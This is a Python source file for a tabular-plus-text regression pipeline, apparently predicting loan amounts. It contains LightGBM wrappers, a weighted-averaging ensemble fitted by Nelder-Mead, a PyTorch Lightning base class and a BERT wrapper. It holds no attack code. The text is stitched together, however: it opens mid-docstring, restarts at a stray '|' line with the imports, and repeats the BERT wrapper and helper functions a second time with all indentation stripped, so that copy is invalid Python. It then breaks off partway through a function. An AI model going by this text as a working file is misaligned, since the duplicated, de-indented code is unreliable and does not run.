    The constructor only assembles configuration and the model; training and
    inference come from :class:`PytrochLightningBase`.
    """
    def __init__(self,
                 model_name,
                 auxiliary_loss_flag,
                 text_features_list,
                 embedding_category_features_list,
                 continuous_features_list,
                 label_list,
                 weight_list=None,
                 max_token_len=200, #128,#162,#200,#256, #,
                 _type="regression",
                 exp="None",
                 ):
        super().__init__()
        # Map the short model alias to its pretrained-model id.
        # NOTE(review): an unknown model_name leaves path_of_pretrained_model
        # unbound and raises NameError below — presumably intentional
        # fail-fast; confirm.
        if model_name == "bert":
            path_of_pretrained_model = 'bert-base-cased'
        elif model_name == "bert-tiny":
            path_of_pretrained_model = "prajjwal1/bert-tiny"
        elif model_name == "finbert":
            path_of_pretrained_model = "ipuneetrathore/bert-base-cased-finetuned-finBERT"
        elif model_name == "funnel":
            path_of_pretrained_model = "funnel-transformer/small"
        elif model_name == "bart":
            path_of_pretrained_model = 'facebook/bart-base'
        elif model_name == "distilbert":
            path_of_pretrained_model = 'distilbert-base-cased'
        elif model_name == "multilingual":
            path_of_pretrained_model = "bert-base-multilingual-cased"
        elif model_name == "roberta-base":
            path_of_pretrained_model = "roberta-base"
        elif model_name == "bert-large":
            path_of_pretrained_model = "bert-large-cased"
        elif model_name == "gpt2":
            path_of_pretrained_model = "gpt2"
        self.initial_params["dataset_class"] = BertDataSet
        self.initial_params["collate_fn"] = None#collate_fn_LSTM
        n_classes = len(label_list) #if _type=="regression" else 400
        if auxiliary_loss_flag:
            # The auxiliary target is predicted, so it must not also be fed
            # in as a continuous input feature.
            aux_loss_list = ["loan_in_currency2"]
            continuous_features_list = [c for c in continuous_features_list if c not in aux_loss_list ]
        else:
            aux_loss_list=[]
        self.initial_params["dataset_params"] = {
            "embedding_category_features_list":embedding_category_features_list,
            "continuous_features_list":continuous_features_list,
            "text_feature":text_features_list[0],
            "weight_list":weight_list,
            #"use_feature_cols":use_feature_cols,
            #"last_query_flag":last_query_flag,
            "max_token_len":max_token_len,
            "label_col":label_list + aux_loss_list, #["LOAN_AMOUNT"] + aux_loss_list,
            "path_of_pretrained_model":path_of_pretrained_model,
        }
        # Optional per-column decode dictionary produced by preprocessing,
        # used to size embeddings for columns not hard-coded below.
        ppath_to_decode_dict = PROC_DIR / 'decode_dict.pkl'
        if ppath_to_decode_dict.exists():
            dec_dict = pickle_load(ppath_to_decode_dict)
        else:
            dec_dict=None
        emb_dim_pairs_list = []
        print("embedding_category_features_list")
        # Build (cardinality, embedding_dim) per categorical column.
        # NOTE(review): the numeric dims below are hard-coded dataset
        # cardinalities — confirm they still match the current data.
        for col in embedding_category_features_list:
            if col == "ORIGINAL_LANGUAGE":
                dim = 5
                emb_dim = 3
            elif col == "ACTIVITY_NAME":
                dim = 161
                emb_dim = 50
            elif col == "SECTOR_NAME":
                dim = 15
                emb_dim = 8
            elif col == "COUNTRY_NAME":
                dim = 61
                emb_dim = 30
            elif col == "CURRENCY":
                dim = 51
                emb_dim = 25
            elif col == "REPAYMENT_INTERVAL":
                dim = 3
                emb_dim = 2
            # elif col == "DISTRIBUTION_MODEL":
            #     dim = 2
            #     emb_dim = 2
            elif col == "COUNTRY_CURRENCY":
                dim = 75
                emb_dim = 38
            elif col == "TOWN_NAME_COUNTRY_NAME":
                dim = 2822
                emb_dim = 50
            else:
                # Fall back to the decode dict; columns absent there are skipped.
                if (dec_dict is not None) & (col in dec_dict.keys()):
                    dim = len(dec_dict[col].keys())
                    emb_dim = min(dim//2, 50)
                else:
                    continue
            #dim = int(df_all[col].nunique())
            pair = (dim, emb_dim)
            emb_dim_pairs_list.append(pair)
            print("{} : {}".format(col, pair))
        self.model = myBert(
            model_name=model_name,
            path_of_pretrained_model=path_of_pretrained_model,
            n_numerical_features=len(continuous_features_list),
            n_emb_features = len(embedding_category_features_list),
            emb_dim_pairs_list=emb_dim_pairs_list,
            n_classes=n_classes,
            n_classes_aux=len(aux_loss_list),
            _type = _type,
            exp=exp,
        )
        print(self.model)
    def predict(self, X_test, oof_flag=False):
        # Only a single inference pass is supported for BERT (no TTA).
        num_tta = self.edit_params["num_tta"]
        assert num_tta==1
        if num_tta == 1:
            np_pred = super().predict(X_test, oof_flag)
            #TODO: get final attention
        return np_pred
def prepareModelDir(params, prefix):
    """Ensure the model output directory exists and register the checkpoint
    path under params["path_to_model"]; returns the updated params."""
    save_dir = PATH_TO_MODEL_DIR / params["model_dir_name"]
    if not save_dir.exists():
        save_dir.mkdir()
    params["path_to_model"] = save_dir / f"{prefix}_train_model.ckpt"
    return params
def checkExistsAndAddVnum(ppath_to_model):
    """Return a checkpoint path that does not exist yet, appending
    "-v<N>.ckpt" with increasing N until the name is free."""
    base_stem = ppath_to_model.stem
    candidate = ppath_to_model
    version = 0
    while candidate.exists():
        version += 1
        candidate = candidate.parent / f"{base_stem}-v{version}.ckpt"
    return candidate
class LGBWrapper_Base(object):
    """
    A wrapper for lightgbm model so that we will have a single api for various models.
    """
    def __init__(self):
        self.model = None
        # Default hyperparameters; keys containing "__" are framework-side
        # options stripped before set_params (see extractModelParametersWithStr).
        self.initial_params = {
            'n_jobs': -1,
            #"device":"gpu",
            'boosting_type': 'gbdt',
            "random_seed_name__":"random_state",
            "deal_numpy":False,
            "first_metric_only": True,
            'max_depth': 6,
            #'max_bin': 300,
            #'bagging_fraction': 0.9,
            #'bagging_freq': 1,
            'colsample_bytree': 0.9,
            #'colsample_bylevel': 0.3,
            #'min_data_per_leaf': 2,
            "min_child_samples":12, #8,
            'num_leaves': 120,#240,#2048,#1024,#31,#240,#120,#32, #3000, #700, #500, #400, #300, #120, #80,#300,
            'lambda_l1': 0.9,#0.5,
            'lambda_l2': 0.9,#0.5,
        }
    def getWeight(self, X_train, params):
        """Split off the sample-weight column named in params["weight_list"].

        Returns (X_train_without_weight_column, np_weight_or_None).
        Raises for numpy inputs and for more than one weight column.
        """
        if isinstance(X_train, pd.DataFrame):
            weight_list = params["weight_list"]
            if len(weight_list) == 0:
                np_weight=None
            elif len(weight_list)==1:
                np_weight = X_train[weight_list[0]].values
                X_train = X_train.drop(columns=weight_list)
            else:
                raise Exception("set only one weight col to weight_list")
        else:
            raise Exception("not implemented error : weight col for numpy X_train")
        return X_train, np_weight
    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Fit the underlying lightgbm model with the custom eval metric.

        Sets best_score_, best_iteration_ and feature_importances_ from the
        fitted model.
        """
        self.edit_params=params
        # Only the first metric in the dict is given to lightgbm.
        metric_name = list(params["eval_metric_func_dict__"].keys())[0]
        print(f"metric_name : {metric_name}")
        eval_metric = params["eval_metric_func_dict__"][metric_name]
        # Disable lightgbm's built-in metric; the custom callable is used.
        params["metric"] = "None"
        print(f"----------eval_metric:{callable(eval_metric)}")
        X_train, np_weight = self.getWeight(X_train, params)
        eval_set = [(X_train.values, y_train.values)] if isinstance(X_train, pd.DataFrame) else [(X_train, y_train)]
        eval_names = ['train']
        self.model = self.model.set_params(**extractModelParametersWithStr(params, exclude_str="__"))
        if X_valid is not None:
            if isinstance(X_valid, pd.DataFrame):
                eval_set.append((X_valid.values, y_valid.values))
            else:
                eval_set.append((X_valid, y_valid))
            eval_names.append('valid')
        if X_holdout is not None:
            if isinstance(X_holdout, pd.DataFrame):
                eval_set.append((X_holdout.values, y_holdout.values))
            else:
                eval_set.append((X_holdout, y_holdout))
            eval_names.append('holdout')
        categorical_columns = 'auto'
        call_back_list = []
        if (not ON_KAGGLE) and (params["no_wandb"]==False):
            wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"] )
            wandb.config.update(params, allow_val_change=True)
            call_back_list.append(wandb_callback())
        self.model.fit(X=X_train, y=y_train, sample_weight=np_weight,
                eval_set=eval_set, eval_names=eval_names, eval_metric=eval_metric,
                verbose=params['verbose'], early_stopping_rounds=params['early_stopping_rounds'],
                categorical_feature=categorical_columns,
                callbacks=call_back_list,
                )
        print(self.model)
        self.best_score_ = self.model.best_score_
        print(self.best_score_)
        self.feature_importances_ = self.model.feature_importances_
        self.best_iteration_ = self.model.best_iteration_
    def predict(self, X_test, oof_flag=True):
        # The weight column (if any) must be removed at inference time too.
        X_test, np_weight = self.getWeight(X_test, self.edit_params)
        return self.model.predict(X_test, num_iteration=self.model.best_iteration_).reshape(-1, 1)
    def procModelSaving(self, model_dir_name, prefix, bs):
        """Pickle the trained booster and dump the best-score dict ``bs`` as json."""
        ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
        if not ppath_to_save_dir.exists():
            ppath_to_save_dir.mkdir()
        ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
        pickle.dump(self.model, open(ppath_to_model, 'wb'))
        print(f'Trained LGB model was saved! : {ppath_to_model}')
        with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
            json.dump(bs, fp)
    def procLoadModel(self, model_dir_name, prefix, params):
        """Load a pickled booster and its score json; 0 on success, -1 if missing."""
        ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
        print(f"ppath_to_save_dir : {ppath_to_save_dir}")
        print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
        #print(list(ppath_to_save_dir.iterdir()))
        name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
        if len(name_list)==0:
            print(f'[ERROR] Trained LGB model was NOT EXITS! : {prefix}')
            return -1
        ppath_to_model = name_list[0]
        # if not os.path.exists(ppath_to_model):
        #     print(f'[ERROR] Trained LGB model was NOT EXITS! : {ppath_to_model}')
        #     return -1
        self.model = pickle.load(open(ppath_to_model, 'rb'))
        print(f'Trained LGB model was loaded! : {ppath_to_model}')
        # The filename encodes the best iteration as "iter_<N>__".
        a = int(re.findall('iter_(\d+)__', str(ppath_to_model))[0])
        self.model._best_iteration= a
        #print(self.model.best_iteration_ )
        #self.model.best_iteration_
        self.best_iteration_ = self.model.best_iteration_
        path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
        if not os.path.exists(path_to_json):
            print(f'[ERROR] Trained LGB json was NOT EXITS! : {path_to_json}')
            return -1
        with open(path_to_json) as fp:
            self.best_score_ = json.load(fp)
        #self.model._best_score = json.load(fp)
        return 0
class LGBWrapper_regr(LGBWrapper_Base):
    """
    A wrapper for lightgbm model so that we will have a single api for various models.
    """
    def __init__(self):
        super().__init__()
        self.model = lgb.LGBMRegressor()
        print(f"lgb version : {lgb.__version__}")
        self.initial_params['objective'] = 'regression' #torch_rmse #'regression'
        self.initial_params['metric'] = 'mae'

    @staticmethod
    def _as_series(y):
        # Collapse a single-column target DataFrame into a Series; other
        # inputs pass through untouched.
        if isinstance(y, pd.DataFrame):
            assert y.shape[1] == 1
            return y.iloc[:, 0]
        return y

    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Normalize targets to Series, then delegate to the base fit."""
        y_train = self._as_series(y_train)
        if y_valid is not None:
            y_valid = self._as_series(y_valid)
        if y_holdout is not None:
            y_holdout = self._as_series(y_holdout)
        super().fit(X_train=X_train, y_train=y_train, X_valid=X_valid, y_valid=y_valid, X_holdout=X_holdout, y_holdout=y_holdout, params=params)
class LGBWrapper_cls(LGBWrapper_Base):
    """
    A wrapper for lightgbm model so that we will have a single api for various models.
    """
    def __init__(self):
        super().__init__()
        self.model = lgb.LGBMClassifier()
        self.initial_params['num_leaves'] = 3
        self.initial_params['max_depth'] = 8
        self.initial_params['min_data_in_leaf'] = 3

    def proc_predict(self, X_test, oof_flag=False):
        # OOF predictions use hard labels; otherwise class probabilities.
        if oof_flag:
            return self.model.predict(X_test, num_iteration=self.model.best_iteration_)
        return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)

    def predict(self, X_test, oof_flag=False):
        """Return positive-class probability for binary objectives, else the
        full probability matrix."""
        proba = self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
        if self.model.objective == 'binary':
            return proba[:, 1]
        return proba

    def predict_proba(self, X_test):
        return self.model.predict_proba(X_test, num_iteration=self.model.best_iteration_)
| # coding:utf-8
import os
import pathlib
import numpy as np
import pandas as pd
import lightgbm as lgb
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping, ModelCheckpoint
from pytorch_lightning.loggers import WandbLogger
from DNNmodel import *
from utils import *
def extractModelParameters(original_param, model):
    """Keep only the entries of original_param that model.get_params() accepts."""
    valid_keys = model.get_params().keys()
    model_params = {k: v for k, v in original_param.items() if k in valid_keys}
    print(model_params)
    return model_params
def extractModelParametersWithStr(original_param, exclude_str="__"):
    """Return a copy of original_param without keys containing exclude_str."""
    model_params = {k: v for k, v in original_param.items() if exclude_str not in k}
    print(model_params)
    return model_params
class Averaging_Wrapper(object):
    """Ensemble model that blends per-model OOF/test predictions with a
    weighted sum, exposing the same fit/predict API as the other wrappers.

    Rates are either passed in (``rate_list``) or fitted by Nelder-Mead in
    :meth:`fit`; when ``rate_list_`` is None, predict falls back to a plain
    row-mean.
    """
    def __init__(self, df_train, df_test, target_col, path_to_meta_feature_dir, rate_list=None):
        self.model = None
        self.initial_params = {
            "random_seed_name__":"random_state",
        }
        self.target_col = target_col
        # Blending weights; None until fitted (or provided by the caller).
        self.rate_list_ = rate_list
        self.best_iteration_ = 1
        # Load per-model OOF / test prediction columns from csv files.
        self.df_meta_train, self.df_meta_test = self.setMetaFromFiles(path_to_meta_feature_dir)
        # NOTE(review): idx1/idx2 are computed but never used — presumably
        # leftovers from an index-consistency check.
        idx1 = set(self.df_meta_train.index)
        idx2 = set(df_train.index)
        print(f"df_meta_train : {self.df_meta_train.shape}")
        print(f"df_train : {df_train.shape}")
        # Attach the ground-truth target aligned on the meta-train index.
        self.df_meta_train[target_col] = df_train.loc[self.df_meta_train.index, target_col]
    def setMeta(self, df_train, df_test, target_col:str, y_pred_list:list, oof_list:list):
        """Build meta train/test frames from in-memory prediction arrays."""
        np_y_pred = np.concatenate(y_pred_list, 1)
        np_oof = np.concatenate(oof_list, 1)
        print(np_y_pred.shape)
        print(np_oof.shape)
        self.df_meta_test = pd.DataFrame(np_y_pred, index=df_test.index)
        self.df_meta_train = pd.DataFrame(np_oof, index=df_train.index)
        self.df_meta_train[target_col] = df_train[target_col]
    def setMetaFromFiles(self, path_to_meta_feature_dir):
        """Collect (oof, submission) csv pairs from the given directory.

        For each "*--_oof.csv" a matching "*--_submission.csv" is expected.
        Rows with any NaN are dropped from the OOF frame.
        Returns (df_oof, df_pred) with one column per source model; also
        stores the file names in self.name_list.
        """
        pp_dir = pathlib.Path(path_to_meta_feature_dir)
        y_pred_list=[]
        oof_list = []
        name_list = []
        for f in pp_dir.glob('*--_oof.csv'):
            oof_f_name = f.name
            name_list.append(oof_f_name)
            print(oof_f_name)
            df_oof = pd.read_csv(str(f.parent/oof_f_name), index_col=0)[self.target_col]
            print(f"df_oof : {df_oof}")
            oof_list.append(df_oof)
            # The matching test-prediction file only differs by its suffix.
            pred_f_name = oof_f_name.replace("oof", "submission")
            print(pred_f_name)
            df_pred = pd.read_csv(str(f.parent/pred_f_name), index_col=0)[self.target_col]
            print(f"df_pred : {df_pred}")
            y_pred_list.append(df_pred)
        df_oof = pd.concat(oof_list, axis=1)
        df_oof.columns = name_list
        #df_oof.columns=[i for i in range(0, len(df_oof.columns))]
        # Drop any OOF row that is NaN in at least one model's column.
        has_null_row_index = df_oof.loc[df_oof.isnull().any(axis=1)].index
        df_oof = df_oof.loc[~df_oof.index.isin(has_null_row_index)]
        df_pred = pd.concat(y_pred_list, axis=1)
        df_pred.columns = name_list
        #df_pred.columns=[i for i in range(0, len(df_pred.columns))]
        self.name_list = name_list
        #pdb.set_trace()
        return df_oof, df_pred
    def procModelSaving(self, model_dir_name, prefix, bs):
        """Append this fold's blending rates as a new column of rate.csv."""
        ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
        if not ppath_to_save_dir.exists():
            ppath_to_save_dir.mkdir()
        se_rate = pd.Series(self.rate_list_, index=self.name_list)
        ppath_to_rate_file = ppath_to_save_dir / "rate.csv"
        if ppath_to_rate_file.exists():
            df_rate = pd.read_csv(ppath_to_rate_file, index_col=0)
            se_rate.name = f"fold{df_rate.shape[1]}"
            df_rate = pd.concat([df_rate, se_rate], axis=1)
        else:
            se_rate.name = "fold0"
            df_rate = pd.DataFrame(se_rate)
        df_rate.to_csv(ppath_to_rate_file)
        print("######################")
        print("### rate ###")
        print(df_rate.mean(axis=1))
        #pdb.set_trace()
    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Fit blending rates (if not preset) by Nelder-Mead on the first
        metric in params["eval_metric_func_dict__"], then score all splits."""
        best_score_dict={}
        eval_metric_func_dict = params["eval_metric_func_dict__"]
        print(X_train)
        if self.rate_list_ == None:
            f = list(eval_metric_func_dict.values())[0]
            def calc_loss_f(_rate_list, df_input_X, y_true):
                # Weighted sum of column predictions, scored by the metric.
                this_pred = np.zeros(len(df_input_X))
                for c, r in zip(df_input_X.columns, _rate_list):
                    this_pred += (df_input_X[c] * r).values
                score = f(y_pred=this_pred, y_true=y_true)
                return score
            # Start from equal weights of 0.5 per column.
            initial_rate_list = [0.5] * X_train.shape[1]
            loss_partial = partial(calc_loss_f, df_input_X=X_train, y_true=y_train.values)
            opt_result = sp.optimize.minimize(loss_partial, initial_rate_list, method='nelder-mead')
            self.rate_list_ = opt_result["x"].tolist()
            print(f"***** opt result : {self.rate_list_} *****")
            print()
            #pdb.set_trace()
        y_train_pred = self.predict(X_train) #X_train.mean(axis=1).values
        print(y_train_pred)
        best_score_dict["train"]=calcEvalScoreDict(y_true=y_train.values, y_pred=y_train_pred, eval_metric_func_dict=eval_metric_func_dict)
        if X_valid is not None:
            #y_valid_pred = self.model.predict(X_valid)
            y_valid_pred = self.predict(X_valid) #X_valid.mean(axis=1).values
            best_score_dict["valid"] = calcEvalScoreDict(y_true=y_valid.values, y_pred=y_valid_pred, eval_metric_func_dict=eval_metric_func_dict)
        if X_holdout is not None:
            #y_holdout_pred = self.model.predict(X_holdout)
            y_holdout_pred = self.predict(X_holdout)#X_holdout.mean(axis=1).values
            best_score_dict["holdout"] = calcEvalScoreDict(y_true=y_holdout.values, y_pred=y_holdout_pred, eval_metric_func_dict=eval_metric_func_dict)
        self.best_score_ = best_score_dict
        print(self.best_score_)
        self.setFeatureImportance(X_train.columns)
    def predict(self, X_test, oof_flag=True):
        """Blend columns with the fitted rates; plain row-mean when unfitted.

        NOTE(review): the unfitted branch returns a 1-D array while the
        fitted branch returns shape (n, 1) — callers appear to accept both.
        """
        if self.rate_list_ == None:
            print(f"X_test : {X_test}")
            print(f"X_test.mean(axis=1) : {X_test.mean(axis=1)}")
            return X_test.mean(axis=1).values
        else:
            pred = np.zeros(len(X_test))
            for c, r in zip(X_test.columns, self.rate_list_):
                pred += (X_test[c] * r).values
            return pred.reshape(-1, 1)
    def setFeatureImportance(self, columns_list):
        # Averaging has no per-feature importances; keep a zero vector for
        # interface compatibility with the other wrappers.
        self.feature_importances_ = np.zeros(len(columns_list))
class PytrochLightningBase():
    """Base wrapper exposing an sklearn-like fit/predict API over a
    pytorch-lightning model.

    NOTE(review): the misspelling "Pytroch" is kept because subclasses and
    callers reference this exact name.
    """
    def __init__(self):
        super().__init__()
        # Defaults shared by all subclasses; subclasses extend this dict.
        self.initial_params = {
            "eval_max_or_min": "min",
            "val_every": 1,
            "dataset_params": {},
            "random_seed_name__": "random_state",
            'num_class': 1, #binary classification as regression with value between 0 and 1
            "use_gpu": 1,
            'multi_gpu': False,
        }
        self.edit_params = {}
        self.best_iteration_ = 1
        self.reload_flag = False  # True once weights were reloaded from disk
        self.model = None

    def fit(self, X_train, y_train, X_valid=None, y_valid=None, X_holdout=None, y_holdout=None, params=None):
        """Train self.model with pytorch-lightning.

        Sets ``self.trainer``, ``self.best_score_``, ``self.best_iteration_``
        and a zero feature-importance vector (NNs have none).
        """
        params = prepareModelDir(params, self.__class__.__name__)
        self.edit_params = params
        pl.seed_everything(params[params["random_seed_name__"]])
        torch.backends.cudnn.enabled = True
        self.model.setParams(params)
        batch_size = params["batch_size"]
        if batch_size < 0:
            # Negative batch_size means full-batch training.
            batch_size = X_train.shape[0]
        data_set_train = params["dataset_class"](X_train, y_train, params["dataset_params"], train_flag=True)
        dataloader_train = torch.utils.data.DataLoader(data_set_train, batch_size=batch_size, shuffle=True, collate_fn=params["collate_fn"], num_workers=params["num_workers"])
        dataloader_val = None
        if X_valid is not None:
            data_set_val = params["dataset_class"](X_valid, y_valid, params["dataset_params"], train_flag=True)
            dataloader_val = torch.utils.data.DataLoader(data_set_val, batch_size=batch_size, shuffle=False, collate_fn=params["collate_fn"], num_workers=params["num_workers"])
        wandb_logger = None
        if (not ON_KAGGLE) and (params["no_wandb"] == False):
            wandb_run = wandb.init(project=PROJECT_NAME, group=params["wb_group_name"], reinit=True, name=params["wb_run_name"])
            # BUG FIX: keyword was misspelled "experment"; the created run was
            # silently ignored and WandbLogger started its own run.
            wandb_logger = WandbLogger(experiment=wandb_run)
            wandb_logger.log_hyperparams(params)
        monitor_name = f'val_{params["eval_metric"]}'
        early_stop_callback = EarlyStopping(
            monitor=monitor_name,
            min_delta=0.00,
            patience=params['early_stopping_rounds'],
            verbose=True,
            mode=params['eval_max_or_min']
        )
        checkpoint_callback = ModelCheckpoint(
            dirpath=PATH_TO_MODEL_DIR / params["model_dir_name"],
            filename=params["path_to_model"].stem,
            verbose=True,
            monitor=monitor_name,
            mode=params['eval_max_or_min'],
            save_weights_only=True,
        )
        callbacks_list = []
        # Early stopping / checkpointing only when it can trigger within the run.
        if params['early_stopping_rounds'] <= self.initial_params["epochs"]:
            callbacks_list = [early_stop_callback, checkpoint_callback]
        metrics_callback = MetricsCallback(monitor_metric=monitor_name, min_max_flag=params['eval_max_or_min'])
        callbacks_list.append(metrics_callback)
        self.trainer = pl.Trainer(
            num_sanity_val_steps=0,
            gpus=self.initial_params["use_gpu"],
            check_val_every_n_epoch=self.initial_params["val_every"],
            max_epochs=self.initial_params["epochs"],
            accumulate_grad_batches=self.initial_params["accumulate_grad_batches"],
            callbacks=callbacks_list,
            logger=wandb_logger,
        )
        self.trainer.fit(self.model, dataloader_train, dataloader_val)
        if X_valid is None:
            # No validation loop ran, so save the final weights manually
            # under a versioned name.
            new_path = checkExistsAndAddVnum(params["path_to_model"])
            self.trainer.save_checkpoint(str(new_path))
        self.best_score_, self.best_iteration_ = metrics_callback.getScoreInfo()
        print(self.best_score_)
        self.feature_importances_ = np.zeros(len(X_train.columns))

    def predict(self, X_test, oof_flag=False):
        """Run inference, optionally with test-time augmentation (num_tta>1);
        returns the mean prediction over TTA passes."""
        num_tta = self.edit_params["num_tta"]
        batch_size = self.edit_params["batch_size"]
        # The dataset class expects a target frame; feed zeros at inference.
        dummy_y = pd.DataFrame(np.zeros((X_test.shape[0], 1)), index=X_test.index)
        data_set_test = self.edit_params["dataset_class"](X_test, dummy_y, self.edit_params["dataset_params"], train_flag=(num_tta > 1))
        dataloader_test = torch.utils.data.DataLoader(data_set_test, batch_size=batch_size, shuffle=False, collate_fn=self.edit_params["collate_fn"], num_workers=self.edit_params["num_workers"])
        self.model.oof_prediction = oof_flag
        if self.model.oof_prediction == False:
            self.trainer.logger = None
        tta_list = []
        for tta_i in range(num_tta):
            print(f"tta : {tta_i+1}th")
            if self.reload_flag:
                # Reloaded weights live in self.model; don't look for a checkpoint.
                self.trainer.test(test_dataloaders=dataloader_test, model=self.model)
            else:
                self.trainer.test(test_dataloaders=dataloader_test, ckpt_path='best')
            final_preds = self.model.final_preds
            tta_list.append(final_preds)
        return np.array(tta_list).mean(axis=0)

    def procModelSaving(self, model_dir_name, prefix, bs):
        """Save model weights plus the best-score dict ``bs`` as json."""
        ppath_to_save_dir = PATH_TO_MODEL_DIR / model_dir_name
        if not ppath_to_save_dir.exists():
            ppath_to_save_dir.mkdir()
        ppath_to_model = ppath_to_save_dir / f"model__{prefix}__{model_dir_name}__{self.__class__.__name__}.pkl"
        torch.save(self.model.state_dict(), str(ppath_to_model))
        print(f'Trained nn model was saved! : {ppath_to_model}')
        with open(str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json"), 'w') as fp:
            json.dump(bs, fp)

    def procLoadModel(self, model_dir_name, prefix, params):
        """Load saved weights and score json; return 0 on success, -1 if missing."""
        self.edit_params = params
        self.model.cuda()
        if params["multi_gpu"]:
            self.model = nn.DataParallel(self.model)
        ppath_to_save_dir = PATH_TO_UPLOAD_MODEL_PARENT_DIR / model_dir_name
        print(f"ppath_to_save_dir : {ppath_to_save_dir}")
        print(list(ppath_to_save_dir.glob(f'model__{prefix}*')))
        name_list = list(ppath_to_save_dir.glob(f'model__{prefix}*'))
        if len(name_list) == 0:
            print(f'[ERROR] Trained nn model was NOT EXITS! : {prefix}')
            return -1
        ppath_to_model = name_list[0]
        ppath_to_ckpt_model = searchCheckptFile(ppath_to_save_dir, ppath_to_model, prefix)
        self.model.load_state_dict(torch.load(str(ppath_to_ckpt_model))["state_dict"])
        print(f'Trained nn model was loaded! : {ppath_to_ckpt_model}')
        # The stored filename encodes the best iteration as "iter_<N>__".
        # (raw string fixes the invalid \d escape warning)
        a = int(re.findall(r'iter_(\d+)__', str(ppath_to_model))[0])
        self.best_iteration_ = a
        path_to_json = str(ppath_to_model).replace("model__", "bs__").replace("pkl", "json")
        if not os.path.exists(path_to_json):
            print(f'[ERROR] Trained nn json was NOT EXITS! : {path_to_json}')
            return -1
        with open(path_to_json) as fp:
            self.best_score_ = json.load(fp)
        self.trainer = pl.Trainer(
            num_sanity_val_steps=0,
            gpus=self.edit_params["use_gpu"],
            check_val_every_n_epoch=self.edit_params["val_every"],
            max_epochs=self.edit_params["epochs"],
        )
        self.reload_flag = True
        return 0
class BERT_Wrapper(PytrochLightningBase):
def __init__(self,
model_name,
auxiliary_loss_flag,
text_features_list,
embedding_category_features_list,
continuous_features_list,
label_list,
weight_list=None,
max_token_len=200, #128,#162,#200,#256, #,
_type="regression",
exp="None",
):
super().__init__()
if model_name == "bert":
path_of_pretrained_model = 'bert-base-cased'
elif model_name == "bert-tiny":
path_of_pretrained_model = "prajjwal1/bert-tiny"
elif model_name == "finbert":
path_of_pretrained_model = "ipuneetrathore/bert-base-cased-finetuned-finBERT"
elif model_name == "funnel":
path_of_pretrained_model = "funnel-transformer/small"
elif model_name == "bart":
path_of_pretrained_model = 'facebook/bart-base'
elif model_name == "distilbert":
path_of_pretrained_model = 'distilbert-base-cased'
elif model_name == "multilingual":
path_of_pretrained_model = "bert-base-multilingual-cased"
elif model_name == "roberta-base":
path_of_pretrained_model = "roberta-base"
elif model_name == "bert-large":
path_of_pretrained_model = "bert-large-cased"
elif model_name == "gpt2":
path_of_pretrained_model = "gpt2"
self.initial_params["dataset_class"] = BertDataSet
self.initial_params["collate_fn"] = None#collate_fn_LSTM
n_classes = len(label_list) #if _type=="regression" else 400
if auxiliary_loss_flag:
aux_loss_list = ["loan_in_currency2"]
continuous_features_list = [c for c in continuous_features_list if c not in aux_loss_list ]
else:
aux_loss_list=[]
self.initial_params["dataset_params"] = {
"embedding_category_features_list":embedding_category_features_list,
"continuous_features_list":continuous_features_list,
"text_feature":text_features_list[0],
"weight_list":weight_list,
#"use_feature_cols":use_feature_cols,
#"last_query_flag":last_query_flag,
"max_token_len":max_token_len,
"label_col":label_list + aux_loss_list, #["LOAN_AMOUNT"] + aux_loss_list,
"path_of_pretrained_model":path_of_pretrained_model,
}
ppath_to_decode_dict = PROC_DIR / 'decode_dict.pkl'
if ppath_to_decode_dict.exists():
dec_dict = pickle_load(ppath_to_decode_dict)
else:
dec_dict=None
emb_dim_pairs_list = []
print("embedding_category_features_list")
for col in embedding_category_features_list:
if col == "ORIGINAL_LANGUAGE":
dim = 5
emb_dim = 3
elif col == "ACTIVITY_NAME":
dim = 161
emb_dim = 50
elif col == "SECTOR_NAME":
dim = 15
emb_dim = 8
elif col == "COUNTRY_NAME":
dim = 61
emb_dim = 30
elif col == "CURRENCY":
dim = 51
emb_dim = 25
elif col == "REPAYMENT_INTERVAL":
dim = 3
emb_dim = 2
# elif col == "DISTRIBUTION_MODEL":
# dim = 2
# emb_dim = 2
elif col == "COUNTRY_CURRENCY":
dim = 75
emb_dim = 38
elif col == "TOWN_NAME_COUNTRY_NAME":
dim = 2822
emb_dim = 50
else:
if (dec_dict is not None) & (col in dec_dict.keys()):
dim = len(dec_dict[col].keys())
emb_dim = min(dim//2, 50)
else:
continue
#dim = int(df_all[col].nunique())
pair = (dim, emb_dim)
emb_dim_pairs_list.append(pair)
print("{} : {}".format(col, pair))
self.model = myBert(
model_name=model_name,
path_of_pretrained_model=path_of_pretrained_model,
n_numerical_features=len(continuous_features_list),
n_emb_features = len(embedding_category_features_list),
emb_dim_pairs_list=emb_dim_pairs_list,
n_classes=n_classes,
n_classes_aux=len(aux_loss_list),
_type = _type,
exp=exp,
)
print(self.model)
def predict(self, X_test, oof_flag=False):
    """Delegate prediction to the parent wrapper.

    Only a single TTA pass is supported (``edit_params["num_tta"] == 1``);
    anything else is a configuration error.
    """
    assert self.edit_params["num_tta"] == 1
    # TODO: get final attention
    return super().predict(X_test, oof_flag)
def prepareModelDir(params, prefix):
    """Ensure the model output directory exists and record the checkpoint path.

    Stores ``<dir>/<prefix>_train_model.ckpt`` under ``params["path_to_model"]``
    and returns the (mutated) params dict.
    """
    save_dir = PATH_TO_MODEL_DIR / params["model_dir_name"]
    save_dir.mkdir(exist_ok=True)
    params["path_to_model"] = save_dir / f"{prefix}_train_model.ckpt"
    return params
def checkExistsAndAddVnum(ppath_to_model):
